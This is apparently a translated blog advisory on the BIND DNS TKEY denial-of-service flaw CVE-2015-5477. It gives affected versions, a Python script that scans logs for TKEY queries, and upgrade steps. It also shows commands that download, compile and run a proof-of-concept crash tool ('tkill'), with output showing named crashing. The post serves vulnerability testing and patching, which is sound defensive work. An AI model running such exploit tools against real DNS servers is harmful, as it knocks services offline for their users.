
Serious DoS vulnerability disclosed in the BIND DNS server software (CVE-2015-5477)

IT Technology ipcpu 5168 views


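Vulnerability description

ISC recently published a security vulnerability (CVE-2015-5477) that affects every BIND version other than the latest. An attacker can exploit it to carry out a DoS attack against the BIND DNS service, causing the DNS service process to terminate.

Affected versions

Self-compiled versions: 9.1.0 -> 9.8.x, 9.9.0 -> 9.9.7-P1, 9.10.0 -> 9.10.2-P2
Red Hat AS6: versions earlier than bind-9.8.2-0.37.rc1.el6_7.2
Red Hat AS5: versions earlier than bind-9.3.6-25.P1.el5_11.3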

Vulnerability testing

Very dangerous: do not test against production services. The daemon of a vulnerable DNS service will crash.
A. Test method

  [@ ~]# wget http://NOTVALID/script/tkill.c
  [@ ~]# gcc -g -o tkill tkill.c
  [@ ~]# chmod a+x tkill
  [@ ~]# ./tkill localhost
  # If the DNS service crashes, this DNS server is vulnerable; if the words "not vulnerable" appear, the vulnerability did not take effect.

B. Test results

  [@ ~]# ./tkill localhost
  --- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
  [+] localhost: Resolving to IP address
  [+] localhost: Resolved to multiple IPs (NOTE)
  [+] ::1: Probing...
  [+] Querying version...
  [+] ::1: "9.11.0pre-alpha"
  [+] Sending DoS packet...
  [+] Waiting 5-sec for response...
  [+] timed out, probably crashed
  [+] 127.0.0.1: Probing...
  [+] Querying version...
  [-] timed out getting version, trying again
  [-] timed out getting version, trying again
  [-] timed out getting version, trying again
  [-] Can't query server, is it crashed already?
  [-] Sending exploit anyway.
  [+] Sending DoS packet...
  [+] Waiting 5-sec for response...
  [+] timed out, probably crashed

On inspection, the named process had already crashed.

C. Service log

  Aug 4 15:32:48 dns named[2717]: client a.b.c.d#42212 (foo.bar): view north_america: query: foo.bar ANY TKEY + (x.y.z.zz)
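
The log line above shows what to look for on the defensive side: a query whose type is TKEY. The following Python script is an added example (not from the original post or from ISC) that scans named query-log lines for TKEY queries and counts them per client; the sample lines, addresses and function names are constructed for illustration, and it assumes query logging is enabled on the server.

```python
import re
from collections import Counter

# Shape of a BIND query-log line, as in the service log above:
#   named[PID]: client ADDR#PORT (NAME): [view VIEW: ]query: NAME CLASS TYPE FLAGS
# The optional "@0x..." token covers newer BIND releases that log a client object id.
QUERY_RE = re.compile(
    r"named\[\d+\]: client (?:@0x[0-9a-fA-F]+ )?(?P<addr>\S+)#(?P<port>\d+)"
    r"(?: \([^)]*\))?: (?:view (?P<view>[^:]+): )?"
    r"query: (?P<qname>\S+) (?P<qclass>\S+) (?P<qtype>\S+)"
)

# Constructed sample lines (documentation addresses), not taken from a real server.
SAMPLE_LOG = [
    "Aug  4 15:32:48 dns named[2717]: client 192.0.2.10#42212 (foo.bar): "
    "view north_america: query: foo.bar ANY TKEY + (198.51.100.53)",
    "Aug  4 15:32:49 dns named[2717]: client 192.0.2.11#5353 (www.example.com): "
    "view north_america: query: www.example.com IN A + (198.51.100.53)",
    "Aug  4 15:33:02 dns named[2717]: client 192.0.2.10#42213 (foo.bar): "
    "query: foo.bar ANY TKEY + (198.51.100.53)",
    "Aug  4 15:33:05 dns named[2717]: client @0x7f3c1c0a 203.0.113.7#40000 "
    "(x.example): query: x.example IN tkey +E(0) (198.51.100.53)",
    "Aug  4 15:33:09 dns named[2717]: zone example.com/IN: loaded serial 2015080401",
]

def find_tkey_queries(lines):
    """Return one dict per logged query whose type is TKEY (case-insensitive)."""
    hits = []
    for line in lines:
        m = QUERY_RE.search(line)
        if m and m.group("qtype").upper() == "TKEY":
            hits.append({k: m.group(k) for k in ("addr", "view", "qname", "qclass")})
    return hits

def clients_by_count(hits):
    """Rank client addresses by the number of TKEY queries they sent."""
    return Counter(h["addr"] for h in hits).most_common()

if __name__ == "__main__":
    for addr, n in clients_by_count(find_tkey_queries(SAMPLE_LOG)):
        print(f"{addr}\t{n} TKEY queries")
```

TKEY is also used legitimately (for example, GSS-TSIG dynamic updates), so treat hits as leads to triage rather than confirmed attacks.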

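Solution:

Upgrade to the latest version; manually compiled builds can also be patched.

The official website does not appear to offer a patch package; one can be found in the SRPM files provided on Red Hat's FTP.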

  [@ ~]# yum update bind

Test after updating

  [@ ~]# ./tkill localhost
  --- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
  [+] localhost: Resolving to IP address
  [+] localhost: Resolved to multiple IPs (NOTE)
  [+] 127.0.0.1: Probing...
  [+] Querying version...
  [+] 127.0.0.1: "9.3.6-P1-RedHat-9.3.6-25.P1.el5_11.3"
  [+] Sending DoS packet...
  [+] Waiting 5-sec for response...
  [-] 127.0.0.1: got response, so probably not vulnerable

Related links:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477
http://www.isc.org/downloads
https://ring0.me/2015/08/exploit-dns-server-with-one-packet/
